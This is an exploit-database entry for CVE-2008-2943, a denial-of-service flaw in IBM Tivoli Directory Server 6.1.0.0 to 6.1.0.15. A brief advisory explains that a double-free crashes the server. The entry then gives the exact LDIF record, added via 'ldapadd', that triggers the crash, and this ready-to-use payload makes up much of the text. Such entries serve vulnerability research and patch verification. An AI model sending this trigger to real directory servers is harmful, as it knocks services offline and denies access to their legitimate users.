IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service
Author: anonymous
type: dos
platform: multiple
port:
date_added: 2008-06-30
date_updated: 2014-03-01
verified: 1
codes: CVE-2008-2943;OSVDB-46577
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/30010/info
IBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error.
An attacker can exploit this issue to crash the affected server with a SIGSEGV fault, denying service to legitimate users.
Tivoli Directory Server 6.1.0.0 - 6.1.0.15 are affected.
The following 'ldapadd' entry is sufficient to trigger the issue:
dn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies
globalGroupName: GlobalAdminGroup
objectclass: top
objectclass: ibm-globalAdminGroup